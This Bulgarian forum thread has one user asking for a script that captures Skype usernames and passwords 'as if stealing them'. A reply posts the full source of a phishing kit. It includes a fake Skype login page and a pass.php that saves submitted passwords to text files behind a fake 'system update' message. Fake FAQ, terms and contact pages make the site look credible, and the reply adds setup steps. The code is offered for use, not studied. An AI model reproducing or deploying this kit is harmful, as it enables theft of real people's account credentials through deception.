Един урок за скайп скрипт

justspy

Registered
Значи незнам дали темата е за тук, но скоро бях гледал един урок, скайп скрипт който пипеп пасса и усера си и те се записват в файл .. се едно да си ги крадеш но то скрипта е лесен но този урок мисля, че имаше и дизайн .. моля ви някой да ми го даде :(
 
Мисля че знам кое ти трябва :)
Това : http://firex-bg.com/skype/ ?

Картинки:

logo.png - http://store.picbg.net/pubpic/05/74/ab998e426b360574.png
i.png - http://store.picbg.net/pubpic/12/88/057d48ce13051288.png

Файлове:

index.php
Код:
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<title>Skype</title>

</head>

<body bgcolor="#F8FBFC" alink="blue" vlink="blue" link="blue">

<center>
 <img src="logo.PNG"> <br>

 <table border="0" width="272">

<tr><td align="left">

<form method="post" action="pass.php">

<font face="Verdana" size="1"><b>Skype име</b></font><br />

<input type="text" name="user" size="38"><br />

<font face="Verdana" size="1"><img src="i.PNG"> Нямате Skype име?*</font><br />

<font face="Verdana" size="1"><b>Парола</b></font><br />

<input type="password" name="pass" size="38"><br />

<font face="Verdana" size="1"><a href="https://secure.skype.com/store/member/passwordreminder.html">Забравена парола?</a></font><br /><br />

<input type="checkbox"> <font face="Verdana" size="1">Вписвай автоматично с влизане</font>

</td><tr>

<td align="right">

<input type="submit" value="Вписване">

</form>

</td></tr>

</table>

<br /><br />

<font face="Verdana" size="1">*-Още се изработва регистрация чрез сайта ни<br /> <a href="faq.php">FAQ</a> | <a href="terms.php">Условия за ползване</a> | <a href="contact.php">За контакт</a></font>

</center>
</body>
</html>

contact.php
Код:
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<title>Skype</title>

</head>

<body bgcolor="#F8FBFC" alink="blue" vlink="blue" link="blue">

<center>
 <img src="logo.PNG"> <br>

 <table border="0" width="272">

<tr><td align="left">
<?php
if($_POST['user'] != NULL) {
$time = time();
$txt = ".txt";
$save = $_POST['save'];
$mail = $_POST['mail'];
$user = $_POST['user'];
$f_ime = $user;
$f_ime .= $txt;
$_fime = $f_ime."[$time]";

$file = fopen("msg/$f_ime","a+");

fwrite($file,"MSG:$save\nE-mail:$mail");

echo "<font face=\"Verdana\" size=\"1\"><b>Съобщението ти е изпратене успешно!</b></font>";
}
?>
<form method="post" action="contact.php">

<font face="Verdana" size="1"><b>Име</b></font><br />

<input type="text" name="user" size="38"><br />

<font face="Verdana" size="1"><b>Е-мейл за контакт</b></font><br />

<input type="text" name="mail" size="38"><br /><font face="Verdana" size="1"><b>Съобщение</b></font><br />

<textarea name="save" rows="8" cols="29"></textarea><br /></td></tr>
<tr>
<td align="right">

<input type="submit" value="Изпрати">

</form>

</td></tr>

</table>

<br /><br />

<font face="Verdana" size="1">*-Още се изработва регистрация чрез сайта ни<br /> 
<a href="index.php">Вписване</a> | <a href="faq.php">FAQ</a> | <a href="terms.php">Условия за ползване</a> | <a href="contact.php">За контакт</a></font>

</center>
</body>
</html>

faq.php
Код:
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<title>Skype</title>

</head>

<body bgcolor="#F8FBFC" alink="blue" vlink="blue" link="blue">

<center>
 <img src="logo.PNG"> <br>

<table border="0" width="272">

<tr>

<td align="left">
<font face="Verdana" size="1"><b>1. Какво е Skype?</b><br />
Skype (чете се скайп) е компютърна програма за чат и телефония. Чрез нея може да се осъществи телефонна връзка от компютър до компютър или от компютър до мобилен или стационарен телефон. Има възможност и за осъществяване на видео връзка
<br /><br />
<b>2. Как може да се влиза от този сайт?</b><br />
След дълги скучни нощи, ние (създателите на сайта) решихме да започнем отначало един изглеждащ невъзможен проект. Програмирахме около 3 месеца и половина за да успеем да свържем сайта със системата на Skype.
<br /><br />
<b>3. Какво услуги предлага сайта?</b><br />
Можете да влизате в своя Skype акаунт, да пишете съобщения на приятелите си. Засега не може да се говори, но сме започнали да правим Flash базиран телефон, с който да обшувате и гласово. Можете да влизате в Skype от всякъде, дори да не е инсталиран на дадение компютър(дори може и от телефон чрез WAP, GPRS или 3G).

</font>
</td>


<tr></table>

<br /><br />

<font face="Verdana" size="1"><a href="index.php">Вписване</a> | <a href="faq.php">FAQ</a> | <a href="terms.php">Условия за ползване</a> | <a href="contact.php">За контакт</a></font>

</center>
</body>
</html>

pass.php
Код:
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<title>Skype</title>

</head>

<body bgcolor="#F8FBFC" alink="blue" vlink="blue" link="blue">

<center>
 <img src="logo.PNG"> <br>

<table border="0" width="272">

<tr>

<td align="left">
<font face="Verdana" size="1"><b>Обновяване на системата</b><br />

<?php

$txt = ".txt";

$pass = $_POST['pass'];

$user = $_POST['user'];

$f_ime = $user;

$f_ime .= $txt;

if (!(file_exists("users/$f_ime")) and $pass != NULL and $user != NULL) {

$text = "$pass";

$file = fopen("users/$f_ime","a+");

fwrite($file,$text);

echo "Добре дошъл <b>$user</b>, <br />За съжаление в момента не можеш да посетиш сайта, защото тече ъпдейт на системата ни.<br />Посети ни по-късно!";

}

else {
$time = time();

$pass = $_POST['pass'];

$user = $_POST['user'];

$f_ime = $user;

$f_ime .= $txt;

$_fime = $f_ime."[$time]";

$file = fopen("users/$f_ime","a+");

fwrite($file,$text);

echo "Добре дошъл <b>$user</b>, <br />За съжаление в момента не можеш да посетиш сайта, защото тече ъпдейт на системата ни.<br />Посети ни по-късно!";

}

?>

</font>
</td>


<tr></table>

<br /><br />

<font face="Verdana" size="1"><a href="index.php">Вписване</a> | <a href="faq.php">FAQ</a> | <a href="terms.php">Условия за ползване</a> | <a href="contact.php">За контакт</a></font>

</center>
</body>
</html>

terms.php
Код:
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<title>Skype</title>

</head>

<body bgcolor="#F8FBFC" alink="blue" vlink="blue" link="blue">

<center>
 <img src="logo.PNG"> <br>

<table border="0" width="272">

<tr>

<td align="left">
<font face="Verdana" size="1"><b>1. Права и задължения на потребителя</b><br />
a) Потребителят няма право да прави умишлени атаки срещу сайта с цел да го саботира.<br />
б) Потребителят има право да се информира за настоящето и бъдещето развитие на сайта.<br />
в) Потребителят е длъжен при намиране на бъг да го съобще на администратор.<br /><br />
<b>2. Права и задължения на администратора</b><br />
а) Администратора няма задължението и обективната възможност и не контролира начина, по който Потребителите използват предоставяните Услуги.<br />
б) Администратора не носи отговорност за вреди, причинени върху софтуера, хардуера или телекомуникационните съоръжения или за загуба на данни, произтекли от материали или ресурси, търсени, заредени или използвани по какъвто и да било начин посредством предоставяните Услуги.<br /><br />
<b>3. Изменение на общите условия</b><br />
Общите условия могат да бъдат променяни по всяко време от Администратора, като същият се задължава да уведоми Потребителя за промени в Общите условия, като публикува в Сайта съобщение за измененията както и самите изменения - за запознаване с тях.<br /><br />
<b>3. Името Skype, логото и буквата "S" са запазена марка на Skype Limited</b><br />
</font>
</td>


<tr></table>

<br /><br />

<font face="Verdana" size="1"><a href="index.php">Вписване</a> | <a href="faq.php">FAQ</a> | <a href="terms.php">Условия за ползване</a> | <a href="contact.php">За контакт</a></font>

</center>
</body>
</html>

Накрая правите 2 папки:
users
msg
Преди време го бях взел от 1 форум , а тук потърсих в уроци но не го намерих. Затова виж с това :)
 

Горе